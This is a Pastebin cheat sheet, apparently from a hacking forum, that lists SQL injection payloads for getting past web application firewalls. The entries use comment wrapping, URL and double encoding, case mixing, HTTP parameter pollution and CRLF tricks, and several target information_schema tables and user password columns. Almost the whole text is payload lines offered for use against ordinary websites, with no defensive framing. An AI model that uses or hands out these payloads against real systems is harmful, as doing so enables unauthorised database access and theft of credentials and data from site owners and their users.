API tools faq
paste
Advertisement
KingSkrupellos

WAF Web Güvenlik Duvarı SQLi ByPass Teknikleri

KingSkrupellos
Nov 30th, 2017
419
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.67 KB | None | 0 0
raw download clone embed print report
  1. WAF Web Güvenlik Duvarı SQLi ByPass Teknikleri / ++REP Beğen Tuşuna Basalım Lütfen :cigara:
  2.  
  3. KingSkrupellos - https://www.cyberizm.org/cyberizm-waf-web-guvenlik-duvari-sqli-bypass-teknikleri.html
  4.  
  5. ---------------------------------------WAF BYPASS---------------------------------
  6. 1. Union Select :-
  7. (a):- /*!50000union*/ select Note:-Also can use 00000/12345 Also can use /*!' '*/
  8. (b):- /*!50000union*/ /*!50000select*/
  9. (c):- %0AUNION%23 [also can use for select too]------Dat is URL Encoded
  10. (d):- +--%0Aunion+--%0Aselect+
  11. (e):- +--%0Aunion+--%0Aselect+--%0A1,--%0A2,--%0A3,--%0A4,--%0A5 [Means also use URL Encoded technique in numbers too]
  12. (f):- /%2A%2A/union/%2A%2A/select/%2A%2A/ [Encode to Hex Forbidden Technique: Functions Use:- 1. /%2A%2A/ 2. %2F**%2F ]
  13. (g):- +UnIoN+SeLselectECT+
  14. (h):- Use any characters like :- |, ?, ", ', *, %, � , [], ;, :, \/, $, �, ()... ex:- +uni*on+sel*ect+
  15. (i):- +UnIoN+SeLeCt+
  16. (j):- HTTP Parameter Pollution :- /* &id= */union/* &id= */select/* &id= */
  17. List of all HTTP Technique:- /* &c= */
  18. /* &b= */
  19. /* &id= */
  20. /*&q=*/
  21. /*&prodID=*/
  22. /*&abc=*/
  23. q=select
  24. union /* and b=*/ select
  25. q=select/*&q=*/
  26. q=*/from/*
  27. q=select/*&q=*/name&q=password/*&q=*/
  28. &b= */select+1,2 /?a=1+ union/* &b= */
  29. q=*/name q=password/*
  30. ?id=1 /**/union/* &id= */select/* &id= */pwd/* &id= */from/* &id= */users
  31.  
  32. ________________________________________________________________
  33.  
  34. (k):- CRLF BYPASS TECHNIQUES:-
  35. +%0A%0D/*!%0A%0Dunion*/+%0A%0D/*!50000Select*/%0A%0D/*!
  36. (l):- When Fatal Error comes :-
  37. When this error comes then try null like this :- union select null,2,3,4,5-- error produce
  38. union select 1,null,2,3,4,5-- error produce
  39. union select 1,2,null,4,5-- no error produce
  40. _________________________________________________________________________
  41.  
  42. Try this techniue untill u not get error
  43. (m):- {
  44. +--+Union+--+Select+--+
  45. +#uNiOn+#sEleCt+
  46. +union+distinct+select+
  47. +union+distinctROW+select+
  48. uni<on all sel<ect
  49. +union%23aa%0Aselect+
  50. 0%a0union%a0select%09
  51. %0Aunion%0Aselect%0A
  52. +UnIoN+SeLselectECT+
  53. /%2A%2A/union/%2A%2A/select/%2A%2A/
  54. %2f%2a*/UNION%2f%2a*/SELECT%2f%2a*/
  55. +%2F**%2Funion%2F**%2Fselect+
  56. +UnIoN/*&a=*/SeLeCT/*&a=*/
  57. +%0A%0D/*!%0A%0Dunion*/+%0A%0D/*!50000Select*/%0A%0D
  58. /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
  59. %252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
  60. union(select(0),version(),(0),(0),(0),(0),( 0),(0),(0))
  61. /*!50000union*/+/*!50000select*/
  62. UNIunionON+SELselectECT
  63. +union+distinct+select+
  64. +union+distinctROW+select+
  65. union+/*!select*/+1,2,3
  66. union/**/select/**/1,2,3
  67. uni%20union%20/*!select*/%20
  68. /**//*!union*//**//*!select*//**/
  69. union%23aa%0Aselect
  70. /**/union/*!50000select*/
  71. /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
  72. %252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
  73. +%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
  74. id=1+�UnI�On�+'SeL�ECT� <-MySQL only
  75. id=1+'UnI'||'on'+SeLeCT' <-MSSQL only
  76. }
  77. _____________________________________________________________
  78.  
  79. (n):- Concat Bypassing:-
  80. {
  81. group_concat()
  82. grOUp_ConCat(/*!*/,0x3e,/*!*/)
  83. group_concat(,0x3c62723e)
  84. g%72oup_c%6Fncat%28%76%65rsion%28%29,%22~BlackRose%22%29
  85. CoNcAt()
  86. concat%00()
  87. %00CoNcAt()
  88. CONCAT(DISTINCT )
  89. concat(0x3a,,0x3c62723e)
  90. /*!50000cOnCat*/
  91. concat_ws()
  92. concat_ws(0x3a,)
  93. CONCAT_WS(CHAR(32,58,32),version(),)
  94. REVERSE(tacnoc)
  95. binary(version())
  96. uncompress(compress(version()))
  97. aes_decrypt(aes_encrypt(version(),1),1)
  98. }
  99.  
  100. ________________________________________________________________
  101. (o):- Information schema Bypass :-
  102. 1.information_schema . tables
  103. 2.`information_schema`.`tables`
  104. 3./*!information_schema.tables*/
  105. 4.FROM+information_schema%20%0C%20.%20%09tables
  106. 5.(select+group_concat(table_name)`foo`+From+`information_schema`.`tAblES`+Where+table_ScHEmA=schEMA()) Alternatives Names:- 6.{
  107. information_schema.statistics
  108. information_schema.key_column_usage
  109. information_schema.table_constraints
  110. information_schema.partitions
  111. }
  112. 7. /*!50000column_name*/%0A%46roM%0AInfORmaTion_scHema . cOlumnS%0A%57heRe%0A/*!50000tAblE_naMe*/=hex table
  113.  
  114. 8. (/*!50000%53elect*/%0A/*!50000%54able_name*/%0A%0A/*!50000%46roM*/%0A/*!50000%49nfORmaTion_%53cHema . %54AblES*/%0A/*!50000%57here*/%0A%54able_ScHEmA=schEMA()%0Alimit%0A0,1)
  115.  
  116. 9. String Base SQLI:- put ' and in last use one of these :- -- - -+-- +--+/ --+- #
  117. like AÇIKLISİTE/id=2' --+ gibi
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!